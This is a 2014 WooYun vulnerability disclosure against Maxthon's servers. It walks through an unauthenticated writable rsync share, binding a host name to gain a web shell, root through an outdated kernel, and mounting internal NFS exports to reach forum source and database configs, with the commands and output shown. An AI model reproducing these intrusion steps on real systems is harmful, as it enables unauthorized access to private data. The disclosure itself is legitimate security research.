当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-088352

漏洞标题:傲游内网不完整漫游(大量内外网源码可被泄漏)

相关厂商:傲游

漏洞作者: 杀器王子

提交时间:2014-12-23 22:15

修复时间:2014-12-28 22:16

公开时间:2014-12-28 22:16

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-12-23: 细节已通知厂商并且等待厂商处理中
2014-12-28: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

本来看能不能证明接触到傲游用户的数据,结果发现被管理员发现了,仅仅接触到bbs用户

详细说明:

rsync未授权访问
可写

rsync  60.28.210.24::i.mx/ 
drwxrwxr-x 8192 2014/12/23 19:10:44 .
-rw-r--r-- 6036 2013/10/21 13:30:47 build.txt
-rw-r--r-- 31 2014/12/23 19:10:23 conf.php
-rw-rw-r-- 1406 2013/10/21 13:30:49 favicon.ico
-rw-r--r-- 7166 2014/01/13 15:40:28 feedback.htm
-rw-r--r-- 55790 2014/01/13 15:40:28 index.htm
-rw-r--r-- 132 2013/10/21 13:31:34 index.so.htm
-rw-r--r-- 137 2013/10/21 13:31:34 index.v3.htm
lrwxrwxrwx 31 2014/02/20 17:52:51 key
-rw-r--r-- 30 2013/10/21 13:31:37 test.php
-rw-r--r-- 214 2013/05/30 15:00:17 ???ν???.url
-rw-r--r-- 214 2011/10/14 17:35:44 å?\#202²æ¸¸ä»?\#212æ?\#227¥.url
-rw-r--r-- 214 2013/10/21 13:31:39 ?\#202?游?\#212?\#227?.url
drwxrwxr-x 8192 2012/09/04 23:38:53 _old000
drwxr-xr-x 8192 2012/09/04 23:38:55 branch
drwxr-xr-x 8192 2013/11/06 16:14:21 chajian
drwxr-xr-x 8192 2014/01/13 15:59:24 css
drwxr-xr-x 8192 2014/08/01 11:34:51 data
drwxr-xr-x 8192 2013/10/21 14:46:07 decent_html
drwxr-xr-x 8192 2012/09/04 23:43:03 do_not_delete
drwxr-xr-x 8192 2014/01/03 19:17:48 html
drwxr-xr-x 8192 2013/11/07 17:36:03 i.maxthon.cn
drwxr-xr-x 8192 2012/09/04 23:42:36 i.mx_update
drwxr-xr-x 8192 2013/10/21 14:46:08 i.mximg
drwxrwxrwx 8192 2014/04/10 10:52:17 images
drwxr-xr-x 8192 2014/01/13 15:59:24 js
drwxr-xr-x 8192 2013/06/05 17:38:46 mac
drwxr-xr-x 8192 2013/08/01 15:31:19 mini
drwxr-xr-x 8192 2013/10/21 14:46:20 sound
drwxr-xr-x 8192 2013/05/20 18:05:43 test
drwxr-xr-x 8192 2013/05/20 18:05:43 tuan
drwxr-xr-x 8192 2013/05/20 18:05:43 v2.3.21
drwxr-xr-x 8192 2013/05/20 18:05:43 v2.3.22
drwxr-xr-x 8192 2013/05/20 18:05:43 v2.3.23
drwxrwxr-x 8192 2013/05/20 18:05:43 v3beta
drwxr-xr-x 8192 2014/01/03 19:08:28 widget


访问web发现不存在这些文件,根据i.mx猜测是i.maxthon.cn
ping i.maxthon.cn发现ip不对
果断绑定host到i.maxthon.cn 60.28.210.24
成功访问到本目录文件 getshell

Snip20141223_8.png

漏洞证明:

分析发现
glusterfs#192.168.0.166:/other
504G 160G 320G 34% /mnt/nfs
nfs挂载目录
大量源码泄露

Snip20141223_9.png


[/]$ showmount -e 192.168.0.166
Export list for 192.168.0.166:
/other *
/bbs *


发现166下还有一个bbs目录

/]$ uname -a
Linux cms13393 2.6.18-128.el5 #1 SMP Wed Jan 21 10:41:14 EST 2009 x86_64 x86_64 x86_64 GNU/Linux


本机内核版本低 导致提权

Snip20141223_10.png


nfs挂载

mount -t nfs 192.168.0.166:/bbs /tmp/nfs


Snip20141223_12.png


论坛成功挂载 bbs.maxthon.cn
查看数据库配置 可连接

Snip20141223_13.png


证明过程中发现管理员在看日志 停止测试 提交

root     28678  0.0  0.0  58896   536 pts/0    S+   21:50   0:00 tail -f mx.13393/access_20141223.log
root 28703 0.0 0.0 88936 3252 ? Ss 21:50 0:00 sshd: root [priv]
sshd 28704 0.0 0.0 64096 1460 ? S 21:50 0:00 sshd: root [net]
root 28712 0.0 0.0 10456 872 ? R 21:50 0:00 ps -aux
root 30487 0.0 0.0 102004 916 ? S Feb09 0:00 crond
root 30488 0.0 0.0 8696 828 ? Ss Feb09 0:00 /bin/bash -c /usr/local/php/bin/php -q /data/html/i.mx/i.mx_update/pc/novel/cron.php > /dev/null 2>&1
root 30511 0.0 0.1 91052 4448 ? S Feb09 0:03 /usr/local/php/bin/php -q /data/html/i.mx/i.mx_update/pc/novel/cron.php
sh-3.2# who
songqi pts/0 Dec 23 21:42 (10.0.8.249)
skyyuan pts/1 Dec 23 21:44 (10.0.8.249)

修复方案:

版权声明:转载请注明来源 杀器王子@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-12-28 22:16

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

2015-01-20:已经修复